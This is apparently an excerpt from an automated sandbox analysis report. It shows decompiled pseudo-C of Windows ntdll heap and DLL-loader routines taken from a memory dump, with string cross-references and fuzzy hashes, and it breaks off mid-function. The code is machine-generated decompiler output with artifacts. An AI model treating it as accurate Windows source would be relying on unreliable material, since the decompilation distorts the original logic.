                                                                                                                                                    0x030eaa82
                                                                                                                                                    0x030eaa8f
                                                                                                                                                    0x030eaa94
                                                                                                                                                    0x030eaa96
                                                                                                                                                    0x03132392
                                                                                                                                                    0x031323a1
                                                                                                                                                    0x031323a1
                                                                                                                                                    0x030eaa9c
                                                                                                                                                    0x030eaa9f
                                                                                                                                                    0x030eaaa2
                                                                                                                                                    0x030eaaa2
                                                                                                                                                    0x030eaaa8
                                                                                                                                                    0x030eaaab
                                                                                                                                                    0x030eaaaf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eaab5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eaab5
                                                                                                                                                    0x030ea9d7
                                                                                                                                                    0x030ea9d7
                                                                                                                                                    0x030ea9da
                                                                                                                                                    0x030ea9e0
                                                                                                                                                    0x030ea9e3
                                                                                                                                                    0x030ea9e6
                                                                                                                                                    0x030ea9e9
                                                                                                                                                    0x030ea9eb
                                                                                                                                                    0x030ea9fd
                                                                                                                                                    0x030ea9fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea9eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea983
                                                                                                                                                    0x030ea983
                                                                                                                                                    0x030ea983
                                                                                                                                                    0x030ea987
                                                                                                                                                    0x030ea995
                                                                                                                                                    0x030ea995
                                                                                                                                                    0x030ea995
                                                                                                                                                    0x030ea995
                                                                                                                                                    0x030ea989
                                                                                                                                                    0x030ea98e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea990
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea990
                                                                                                                                                    0x030ea98e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ea983
                                                                                                                                                    0x030ea972
                                                                                                                                                    0x030ea90a
                                                                                                                                                    0x030eaa34
                                                                                                                                                    0x030eaa34
                                                                                                                                                    0x030eaa40
                                                                                                                                                    0x030eaa43
                                                                                                                                                    0x030eaa46
                                                                                                                                                    0x030eaa4d
                                                                                                                                                    0x031323ab
                                                                                                                                                    0x031323b2
                                                                                                                                                    0x031323b8
                                                                                                                                                    0x031323be
                                                                                                                                                    0x031323c3
                                                                                                                                                    0x031323c5
                                                                                                                                                    0x031323cb
                                                                                                                                                    0x031323d1
                                                                                                                                                    0x031323d5
                                                                                                                                                    0x031323f6
                                                                                                                                                    0x031323fb
                                                                                                                                                    0x031323d7
                                                                                                                                                    0x031323ec
                                                                                                                                                    0x031323f1
                                                                                                                                                    0x03132403
                                                                                                                                                    0x03132408
                                                                                                                                                    0x03132410
                                                                                                                                                    0x03132417
                                                                                                                                                    0x03132422
                                                                                                                                                    0x03132422
                                                                                                                                                    0x03132417
                                                                                                                                                    0x031323c5
                                                                                                                                                    0x031323b2
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03132403
                                                                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 031322F3
                                                                                                                                                    • HEAP: , xrefs: 031322E6, 031323F6
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 031322D7, 031323E7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                    • API String ID: 0-1657114761
                                                                                                                                                    • Opcode ID: ec1f33fa0f7d256e89f729902f91ac5f68f22b96bcbd2bfc463b6657b5cc5ed2
                                                                                                                                                    • Instruction ID: 0234faf1654d29439319c4a33d072a935f553da9cf6b3587a5d0e6a3797ada50
                                                                                                                                                    • Opcode Fuzzy Hash: ec1f33fa0f7d256e89f729902f91ac5f68f22b96bcbd2bfc463b6657b5cc5ed2
                                                                                                                                                    • Instruction Fuzzy Hash: 2DD1BB34B012459FDB18DF68C590BAEB7F5BF8C300F1989A9D89A9B341E330E845CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E030EA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E030EDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E03109730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0318A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E03109660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E030CB150();
					} else {
						E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E030CB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E030E7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0318138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E030E7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E030E7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E03181582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E030E7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E030E7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E03181582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0311D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                                                                    0x030ea229
                                                                                                                                                    0x030ea231
                                                                                                                                                    0x030ea23f
                                                                                                                                                    0x030ea242
                                                                                                                                                    0x030ea244
                                                                                                                                                    0x030ea24c
                                                                                                                                                    0x030ea255
                                                                                                                                                    0x030ea25a
                                                                                                                                                    0x030ea25f
                                                                                                                                                    0x03131c76
                                                                                                                                                    0x03131c78
                                                                                                                                                    0x03131c7e
                                                                                                                                                    0x03131c7f
                                                                                                                                                    0x03131c81
                                                                                                                                                    0x03131c82
                                                                                                                                                    0x03131c84
                                                                                                                                                    0x03131c89
                                                                                                                                                    0x03131c8b
                                                                                                                                                    0x03131c9e
                                                                                                                                                    0x03131c9e
                                                                                                                                                    0x03131cab
                                                                                                                                                    0x03131cb2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131cb2
                                                                                                                                                    0x03131c8d
                                                                                                                                                    0x03131c92
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131c94
                                                                                                                                                    0x03131c98
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131c98
                                                                                                                                                    0x030ea265
                                                                                                                                                    0x030ea265
                                                                                                                                                    0x030ea266
                                                                                                                                                    0x030ea26f
                                                                                                                                                    0x030ea270
                                                                                                                                                    0x030ea276
                                                                                                                                                    0x030ea277
                                                                                                                                                    0x030ea279
                                                                                                                                                    0x030ea27e
                                                                                                                                                    0x030ea282
                                                                                                                                                    0x03131db5
                                                                                                                                                    0x03131dbb
                                                                                                                                                    0x03131dc1
                                                                                                                                                    0x03131dc5
                                                                                                                                                    0x03131de4
                                                                                                                                                    0x03131de9
                                                                                                                                                    0x03131dc7
                                                                                                                                                    0x03131ddc
                                                                                                                                                    0x03131de1
                                                                                                                                                    0x03131def
                                                                                                                                                    0x03131df3
                                                                                                                                                    0x03131df7
                                                                                                                                                    0x03131dfe
                                                                                                                                                    0x03131e06
                                                                                                                                                    0x030ea302
                                                                                                                                                    0x030ea308
                                                                                                                                                    0x030ea308
                                                                                                                                                    0x030ea288
                                                                                                                                                    0x030ea28d
                                                                                                                                                    0x030ea294
                                                                                                                                                    0x03131cc1
                                                                                                                                                    0x030ea29a
                                                                                                                                                    0x030ea29a
                                                                                                                                                    0x030ea29a
                                                                                                                                                    0x030ea29f
                                                                                                                                                    0x03131ccb
                                                                                                                                                    0x03131cd1
                                                                                                                                                    0x03131cd8
                                                                                                                                                    0x03131cea
                                                                                                                                                    0x03131cea
                                                                                                                                                    0x03131cd8
                                                                                                                                                    0x030ea2a9
                                                                                                                                                    0x030ea2af
                                                                                                                                                    0x030ea2bc
                                                                                                                                                    0x03131cfd
                                                                                                                                                    0x030ea2c2
                                                                                                                                                    0x030ea2c2
                                                                                                                                                    0x030ea2c2
                                                                                                                                                    0x030ea2c7
                                                                                                                                                    0x03131d07
                                                                                                                                                    0x03131d0d
                                                                                                                                                    0x03131d14
                                                                                                                                                    0x03131d1f
                                                                                                                                                    0x03131d21
                                                                                                                                                    0x03131d2c
                                                                                                                                                    0x03131d2c
                                                                                                                                                    0x03131d2c
                                                                                                                                                    0x03131d47
                                                                                                                                                    0x03131d47
                                                                                                                                                    0x03131d14
                                                                                                                                                    0x030ea2cd
                                                                                                                                                    0x030ea2d2
                                                                                                                                                    0x030ea2d9
                                                                                                                                                    0x03131d5a
                                                                                                                                                    0x030ea2df
                                                                                                                                                    0x030ea2df
                                                                                                                                                    0x030ea2df
                                                                                                                                                    0x030ea2e4
                                                                                                                                                    0x03131d69
                                                                                                                                                    0x03131d6b
                                                                                                                                                    0x03131d76
                                                                                                                                                    0x03131d76
                                                                                                                                                    0x03131d76
                                                                                                                                                    0x03131d91
                                                                                                                                                    0x03131d91
                                                                                                                                                    0x030ea2ea
                                                                                                                                                    0x030ea2f0
                                                                                                                                                    0x030ea2f5
                                                                                                                                                    0x03131da8
                                                                                                                                                    0x03131dad
                                                                                                                                                    0x03131dad
                                                                                                                                                    0x030ea2fd
                                                                                                                                                    0x030ea300
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                    • API String ID: 2994545307-2586055223
                                                                                                                                                    • Opcode ID: 5bf7c60c4d5459425da95c955a1a48d5ab8dca7c4d706566c84562e9bb592e77
                                                                                                                                                    • Instruction ID: e7ee565411e51b333564a51232ab09dbb52ff1451e5a0a46f4e796de7cbd602f
                                                                                                                                                    • Opcode Fuzzy Hash: 5bf7c60c4d5459425da95c955a1a48d5ab8dca7c4d706566c84562e9bb592e77
                                                                                                                                                    • Instruction Fuzzy Hash: DE51D432306780AFD721EB68CC49F7BB7E9FB89B50F080868F8559B291D765D804CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E030F8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x31bd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x31b8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x31b5780 & 0x00000003) != 0) {
							E03145510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x31b5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0310B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x31b7984; // 0x841dd8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x31b8464; // 0x74b10110
					 *0x31bb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E030F9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x31b5780 & 0x00000005) != 0) {
						_push(_t49);
						E03145510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                                                    0x030f8e0f
                                                                                                                                                    0x030f8e16
                                                                                                                                                    0x030f8e19
                                                                                                                                                    0x030f8e1b
                                                                                                                                                    0x030f8e21
                                                                                                                                                    0x030f8e7f
                                                                                                                                                    0x030f8e85
                                                                                                                                                    0x03139354
                                                                                                                                                    0x0313936c
                                                                                                                                                    0x03139371
                                                                                                                                                    0x0313937b
                                                                                                                                                    0x03139381
                                                                                                                                                    0x03139381
                                                                                                                                                    0x0313937b
                                                                                                                                                    0x030f8e9d
                                                                                                                                                    0x030f8e9d
                                                                                                                                                    0x030f8e29
                                                                                                                                                    0x030f8e2c
                                                                                                                                                    0x030f8e38
                                                                                                                                                    0x030f8e3e
                                                                                                                                                    0x030f8e43
                                                                                                                                                    0x030f8eb5
                                                                                                                                                    0x030f8eb9
                                                                                                                                                    0x031392aa
                                                                                                                                                    0x031392af
                                                                                                                                                    0x031392e8
                                                                                                                                                    0x031392e8
                                                                                                                                                    0x031392af
                                                                                                                                                    0x030f8eb9
                                                                                                                                                    0x030f8e45
                                                                                                                                                    0x030f8e53
                                                                                                                                                    0x030f8e5b
                                                                                                                                                    0x030f8e5f
                                                                                                                                                    0x030f8e78
                                                                                                                                                    0x030f8e78
                                                                                                                                                    0x030f8e7d
                                                                                                                                                    0x030f8ec3
                                                                                                                                                    0x030f8ecd
                                                                                                                                                    0x030f8ed2
                                                                                                                                                    0x030f8ed2
                                                                                                                                                    0x030f8ec5
                                                                                                                                                    0x030f8ec5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f8e7d
                                                                                                                                                    0x030f8e67
                                                                                                                                                    0x030f8ea4
                                                                                                                                                    0x0313931a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03139320
                                                                                                                                                    0x030f8ea4
                                                                                                                                                    0x030f8e70
                                                                                                                                                    0x03139325
                                                                                                                                                    0x03139340
                                                                                                                                                    0x03139345
                                                                                                                                                    0x03139345
                                                                                                                                                    0x030f8e76
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 0313933B, 03139367
                                                                                                                                                    • LdrpFindDllActivationContext, xrefs: 03139331, 0313935D
                                                                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0313932A
                                                                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 03139357
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                    • API String ID: 0-3779518884
                                                                                                                                                    • Opcode ID: 7e818d9a2e80d153cb55807053c73f907ae84fac269ea2bc28791d6f8ddd9926
                                                                                                                                                    • Instruction ID: 3ed6db5808a69cb567ae8bd863525ad8a18eab9b0a8fa1fd207755c12b8eff12
                                                                                                                                                    • Opcode Fuzzy Hash: 7e818d9a2e80d153cb55807053c73f907ae84fac269ea2bc28791d6f8ddd9926
                                                                                                                                                    • Instruction Fuzzy Hash: 05412732A023159FDB65EA18D848BF9B2E9AB0920CF0DC5A9EA145B851E7705CC0C293
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031849A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                    • API String ID: 2994545307-336120773
                                                                                                                                                    • Opcode ID: 15b671db3364ed69290df0f025bd289212882ec97475c92c26c050f66c0b0183
                                                                                                                                                    • Instruction ID: 4b0879d012ae8f0db9a6f1fda852edc76de1a646aab28d1df19a6dae9347085e
                                                                                                                                                    • Opcode Fuzzy Hash: 15b671db3364ed69290df0f025bd289212882ec97475c92c26c050f66c0b0183
                                                                                                                                                    • Instruction Fuzzy Hash: E3311335211645EFC324EB99D886FEAB3A8EB48720F194155F8178F251DF71A880CE5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E99BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E030E99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0317FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0318A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0311D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E030CB150();
										} else {
											E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E030CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x31b6378 = 1;
											asm("int3");
											 *0x31b6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E030EA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E030EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E030EBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0318A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
